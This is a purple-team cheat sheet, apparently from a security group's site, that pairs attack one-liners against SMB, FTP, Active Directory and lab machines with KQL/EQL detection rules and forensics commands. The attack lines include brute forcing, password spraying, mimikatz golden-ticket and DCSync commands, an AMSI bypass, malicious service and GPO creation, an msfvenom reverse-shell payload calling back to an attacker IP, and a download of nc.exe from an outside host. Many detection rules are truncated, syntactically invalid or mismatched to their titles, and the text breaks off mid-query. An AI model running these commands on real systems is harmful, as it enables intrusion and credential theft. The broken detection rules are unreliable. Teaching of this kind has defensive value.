Links

Purple Teaming

Discord: https://discord.gg/CqV6aJXMkA
Telegram: https://t.me/Hadess_security

Purple Team Cheat Sheet: SMB Attacks and Detection

SMB Attack Commands

Attack Type
Command
Description
Enumerating Shares
smbclient -L \\\\TARGET_IP
Lists SMB shares on the target.
Null Session
rpcclient -U "" -N TARGET_IP
Connects to the target with a null session.
Brute Force
crackmapexec smb TARGET_IP -u users.txt -p passwords.txt
Brute-forces SMB credentials.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4624
An account was successfully logged on.
`SecurityEvent
4648
A logon was attempted using explicit credentials.
`SecurityEvent
5145
A network share object was checked to see whether client can be granted desired access.
`SecurityEvent

Forensics Commands and Codes

Command
Description
log2timeline.py
Extracts timeline from forensic images.
psort.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Sorts events in the plaso file and outputs to CSV.
fls -r -m "/" image.E01 > bodyfile
Generates a body file from an image.

KQL Rule: Suspicious SMB Login

SecurityEvent
| where EventID == 4624 and LogonType == 3
| where AccountName != "known_good_account"
| project AccountName, IpAddress, TimeGenerated

EQL Rule: Excessive SMB Failures

sequence by AccountName, IpAddress
[any where EventID == 4625]
[any where EventID == 4625] by AccountName, IpAddress
| where sequence.count > 20

KQL Rule: Unusual SMB Traffic

NetworkTraffic
| where Protocol == "SMB" and not(ipAddress in ("known_good_ip_list"))
| summarize Count = count() by IpAddress, Port
| where Count > threshold_value

Purple Team Cheat Sheet: FTP Attacks and Detection

FTP Attack Commands

Attack Type
Command
Description
Anonymous Login
ftp TARGET_IP then enter anonymous as user
Attempts anonymous login to FTP server.
Brute Force
hydra -l user -P passlist.txt ftp://TARGET_IP
Brute-forces FTP credentials.
File Upload
ftp TARGET_IP then use put filename
Uploads a file to the FTP server.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4625
An account failed to log on.
`SecurityEvent
4648
A logon was attempted using explicit credentials.
`SecurityEvent
5156
The Windows Filtering Platform has permitted a connection.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 21 -w ftp_traffic.pcap
Captures FTP traffic on port 21.
plaso -o l2tcsv -f ftp_traffic.pcap -w output.csv
Processes pcap file with Plaso for timeline analysis.
grep -i 'ftp' forensic_image.raw
Searches for FTP-related strings in a forensic image.

KQL Rule: Suspicious FTP Login Attempts

SecurityEvent
| where EventID == 4625 and NetworkInformation.Protocol == "FTP"
| summarize Count = count() by AccountName, IpAddress
| where Count > threshold_value

EQL Rule: FTP Brute Force Detection

sequence by AccountName, IpAddress
[any where EventID == 4625 and NetworkInformation.Protocol == "FTP"]
[any where EventID == 4625 and NetworkInformation.Protocol == "FTP"] by AccountName, IpAddress
| where sequence.count > 20

KQL Rule: Unusual FTP File Uploads

SecurityEvent
| where EventID == 5156 and ApplicationInformation.ApplicationProtocol == "FTP"
| where NetworkInformation.Direction == "Outbound" and NetworkInformation.Port == 21
| summarize Count = count() by FileName, IpAddress
| where Count > threshold_value

Attack Techniques and Commands

Attack Technique
Command
Description
LLMNR Poisoning
Responder -I eth0 -wrf
Uses Responder to poison LLMNR requests.
AS-REP Roasting
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile asrep_hashes
Extracts AS-REP hashes for users without pre-authentication.
ForceChangePassword
Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
Forces a password change for a domain user.
GenericWrite
Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All
Modifies permissions for a domain object.
Password Spraying
crackmapexec smb DOMAIN -u users.txt -p 'Password123' --continue-on-success
Attempts to log in with a common password.
RunForrestRun.exe
.\RunForrestRun.exe -Domain DOMAIN -User user -Password 'Password123'
Executes RunForrestRun for lateral movement.
Abusing Vulnerable GPO
New-GPOImmediateTask -Name "MaliciousTask" -Command "cmd.exe" -Arguments "/c evil_script.bat"
Creates a GPO to run a malicious task.
Abusing MSSQL Service
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "net localgroup Administrators /add DOMAIN\user"
Executes a command via SQL Server.
Abusing Domain Trusts
Get-DomainTrustMapping -API
Enumerates and abuses domain trusts.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4742
A computer account was changed.
`SecurityEvent
4624
An account was successfully logged on.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 445 or port 139 -w smb_traffic.pcap
Captures SMB traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: LLMNR Poisoning Detection

SecurityEvent
| where EventID == 5145 and ShareName == '\\*\\IPC$'
| summarize Count = count() by AccountName, IpAddress
| where Count > threshold_value

EQL Rule: AS-REP Roasting Activity

sequence by AccountName
[any where EventID == 4768 and TicketOptions == '0x40810000']
[any where EventID == 4769] by AccountName
| where sequence.count > 5

KQL Rule: Unusual Process Execution

SecurityEvent
| where EventID == 4688 and NewProcessName contains 'RunForrestRun.exe'
| project AccountName, NewProcessName, CommandLine

Attack Techniques and Commands

Attack Technique
Command
Description
Service Permission
sc.exe sdset SERVICE_NAME DACL_string
Modifies service permissions.
ForceChangePassword
Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
Forces a password change for a domain user.
Abuse ACLs
Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All
Modifies ACLs for domain objects.
Abuse SQL Instance
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.
Abuse Service
sc.exe create evilservice binPath= "cmd.exe /c evil_script.bat"
Creates a malicious service.
Pass the Ticket
mimikatz.exe "kerberos::ptt ticket.kirbi"
Uses stolen Kerberos tickets for authentication.
Golden Ticket
mimikatz.exe "kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_HASH /id:500"
Creates a Golden Ticket for domain persistence.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4672
Special privileges assigned to new logon.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
4728
A member was added to a security-enabled global group.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4769
Kerberos Service Ticket (TGS) was requested.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Service Creation

SecurityEvent
| where EventID == 4688 and NewProcessName contains 'sc.exe'
| where CommandLine contains 'create' and CommandLine contains 'binPath='
| project AccountName, NewProcessName, CommandLine

EQL Rule: Abnormal Kerberos Ticket Requests

sequence by AccountName
[any where EventID == 4768]
[any where EventID == 4769] by AccountName
| where sequence.count > threshold_value

KQL Rule: Suspicious ACL Modifications

SecurityEvent
| where EventID == 4728 or EventID == 4732 or EventID == 4756
| where MemberName contains 'Attacker' or MemberSid contains 'S-1-5-21'
| project TimeGenerated, MemberName, TargetUserName, TargetDomainName

Attack Techniques and Commands

Attack Technique
Command
Description
Always Elevated
Set-ADObject -Identity user -Replace @{msDS-AllowedToActOnBehalfOfOtherIdentity='SDDL_string'}
Modifies AD object to grant elevated privileges.
Constrained Delegation
Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker
Sets constrained delegation on a target computer.
Unconstrained Delegation Print Bug
Rubeus.exe monitor /interval:30 /nowrap
Monitors for TGTs if unconstrained delegation is enabled.
Cross Trust
Get-DomainTrust -Domain target_domain
Enumerates trust relationships between domains.
Abuse MSSQL Service
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4672
Special privileges assigned to new logon.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4769
Kerberos Service Ticket (TGS) was requested.
`SecurityEvent
4624
An account was successfully logged on.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Privilege Escalation

SecurityEvent
| where EventID == 4672
| where AccountName != "known_good_accounts"
| project AccountName, TimeGenerated, ProcessName

EQL Rule: Suspicious Delegation Use

sequence by AccountName
[any where EventID == 4768]
[any where EventID == 4769] by AccountName
| where sequence.count > threshold_value

KQL Rule: Abnormal SQL Server Command Execution

SecurityEvent
| where EventID == 4688 and NewProcessName contains 'sqlservr.exe'
| where CommandLine contains 'malicious_command'
| project AccountName, NewProcessName, CommandLine

Attack Techniques and Commands

Attack Technique
Command
Description
Bypass AMSI
GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Disables AMSI in a PowerShell session.
Always Elevated
Set-ADObject -Identity user -Replace @{msDS-AllowedToActOnBehalfOfOtherIdentity='SDDL_string'}
Modifies AD object to grant elevated privileges.
Constrained Delegation
Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker
Sets constrained delegation on a target computer.
Pass the Ticket
mimikatz.exe "kerberos::ptt ticket.kirbi"
Uses stolen Kerberos tickets for authentication.
Abuse SQL Instance
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.
Abuse GPO
New-GPOImmediateTask -Name "MaliciousTask" -Command "cmd.exe" -Arguments "/c evil_script.bat"
Creates a GPO to run a malicious task.
DSync Attack
mimikatz.exe "lsadump::dcsync /user:domain\krbtgt"
Extracts credentials from AD using DCSync.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4104
PowerShell script block logging.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: AMSI Bypass Detection

SecurityEvent
| where EventID == 4104
| where ScriptBlockText contains 'amsiInitFailed'
| project TimeGenerated, Computer, AccountName, ScriptBlockText

EQL Rule: Unusual Kerberos Ticket Requests

sequence by AccountName
[any where EventID == 4768]
[any where EventID == 4769] by AccountName
| where sequence.count > threshold_value

KQL Rule: Suspicious SQL Command Execution

SecurityEvent
| where EventID == 4688 and NewProcessName contains 'sqlservr.exe'
| where CommandLine contains 'malicious_command'
| project AccountName, NewProcessName, CommandLine

Purple Team Cheat Sheet: Comprehensive Attack Scenario

Attack Techniques and Commands

Attack Technique
Command
Description
Map Scanning
nmap -sC -sV -oA map/result 10.10.10.210
Scans the target for open ports and services.
Gobuster Directory Scanning
gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
Enumerates directories on the web server.
Gathering Usernames
Gather usernames manually and create a user.txt file
Collects usernames for further attacks.
Password Spraying
python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
Attempts to log in with common passwords.
Sending Phishing Emails
Use Outlook to send phishing emails and capture NTLMv2 hash with Responder
Executes a phishing campaign.
Cracking NTLMv2 Hash
hashcat -m 5600 hash /us/share/wordlists/rockyou.txt -force
Cracks captured NTLMv2 hashes.
PowerShell Remote Session
Soffsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
Establishes a remote PowerShell session.
Creating a Symlink
New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'
Creates a symbolic link to escalate privileges.
Using Check-File Command
Check-File C:\programdata\root\Desktop\root.txt
Checks for the presence of a specific file.
Transferring Files with nc.exe
iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'
Transfers files using nc.exe.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4720
A user account was created.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 80 -w http_traffic.pcap
Captures HTTP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Network Traffic

NetworkTraffic
| where DestinationPort == 80 or DestinationPort == 443
| summarize Count = count() by DestinationIP, DestinationPort
| where Count > threshold_value

EQL Rule: Suspicious Process Creation

sequence by Hostname, AccountName
[process where EventID == 4688 and NewProcessName contains 'nc.exe']
[process where EventID == 4688 and NewProcessName contains 'powershell.exe'] by Hostname, AccountName
| where sequence.count > 5

KQL Rule: Abnormal File Access

SecurityEvent
| where EventID == 5145
| where ShareName contains 'C$' or ShareName contains 'ADMIN$'
| project AccountName, ShareName, FileName, IpAddress

Purple Team Cheat Sheet: Web-Based Attack Scenario

Attack Techniques and Commands

Attack Technique
Command
Description
Nmap Scanning
nmap -sC -sV -oA nmap/result 10.10.10.211
Scans the target for open ports and services.
Web Enumeration with Wappalyzer
Use Wappalyzer to identify backend technologies
Identifies technologies used on the web server.
Analyzing .git Directory
Check the Gemfile in the git directory for Ruby and Gem versions
Analyzes the .git directory for sensitive information.
Exploiting Ruby on Rails
Use a Ruby on Rails exploit
Exploits vulnerabilities in Ruby on Rails.
Capturing Request in Burp
Capture the request and modify it with the exploit
Captures and modifies HTTP requests for exploitation.
Getting a Reverse Shell
Use netcat listener and send the exploit to get a reverse shell
Gains shell access on the target system.
Cracking Password Hashes
Use John the Ripper to crack password hashes found in /var/backups
Cracks password hashes to gain credentials.
Bypassing Two-Factor Authentication
Use the contents of .google_authenticator to bypass two-factor authentication
Bypasses 2FA using the .google_authenticator file.
Synchronizing Time for Exploit
Adjust the system time to match the timezone for the exploit to work
Synchronizes system time for time-based exploits.
Gaining Root Access with GTFOBins
sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access
Uses GTFOBins for privilege escalation.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4720
A user account was created.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 80 -w http_traffic.pcap
Captures HTTP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Network Traffic

NetworkTraffic
| where DestinationPort == 80 or DestinationPort == 443
| summarize Count = count() by DestinationIP, DestinationPort
| where Count > threshold_value

EQL Rule: Suspicious Process Creation

sequence by Hostname, AccountName
[process where EventID == 4688 and NewProcessName contains 'nc.exe']
[process where EventID == 4688 and NewProcessName contains 'powershell.exe'] by Hostname, AccountName
| where sequence.count > 5

KQL Rule: Abnormal File Access

SecurityEvent
| where EventID == 5145
| where ShareName contains 'C$' or ShareName contains 'ADMIN$'
| project AccountName, ShareName, FileName, IpAddress

Purple Team Cheat Sheet: Recon to Exploitation Scenario

Attack Techniques and Commands

Stage
Technique
Command
Description
Recon
Nmap Scanning
nmap -sV -sC -oN nmap 10.10.10.237
Scans the target for open ports and services.
Recon
File Analysis
file headv1\\Setup\\1.0.0.exe
Analyzes the executable file for type and content.
Recon
SMB Enumeration
smbclient -L \\\\10.10.10.237
Enumerates SMB shares on the target.
Recon
SMB File Transfer
smbclient \\\\10.10.10.237\\Software_Updates then get UAT_Testing_Procedures.pdf
Transfers files via SMB.
Exploitation
Crafting Malicious Binary
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "rspoof.exe"
Creates a reverse shell executable.
Exploitation
YML File Creation
Manual creation of latest.yml file
Creates a .yml file for the exploit.
Exploitation
SMB File Transfer
smbclient \\\\10.10.10.237\\Software_Updates then put latest.yml
Uploads .yml file via SMB.
Exploitation
Reverse Shell
Use Metasploit to listen for the reverse shell
Listens for an incoming reverse shell connection.
Exploitation
Redis Exploitation
redis-cli -h 10.10.10.237 then get pk:urn:user:e8e29158-d70d-44b1-alba-4949d52790a0
Exploits Redis to retrieve data.
Exploitation
Password Decryption
python3 decrypt.py with the script provided in the summary
Decrypts a password using a provided script.

Detection: Event Codes and KQL/EQL Rules

Event Code
Description
KQL/EQL Rule
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent

Forensics Commands and Codes

Command
Description
tcpdump -i eth0 port 445 -w smb_traffic.pcap
Captures SMB traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual SMB Traffic

SecurityEvent
| where EventID == 5145
| where ShareName contains 'Software_Updates'
| project AccountName, ShareName, FileName, IpAddress

EQL Rule: Suspicious Process Execution

sequence by Hostname, AccountName
[process where EventID == 4688 and NewProcessName contains 'rspoof.exe']
[process where EventID == 4688 and NewProcessName contains 'redis-cli'] by Hostname, AccountName
| where sequence.count > 2

KQL Rule: Abnormal File Access Patterns

SecurityEvent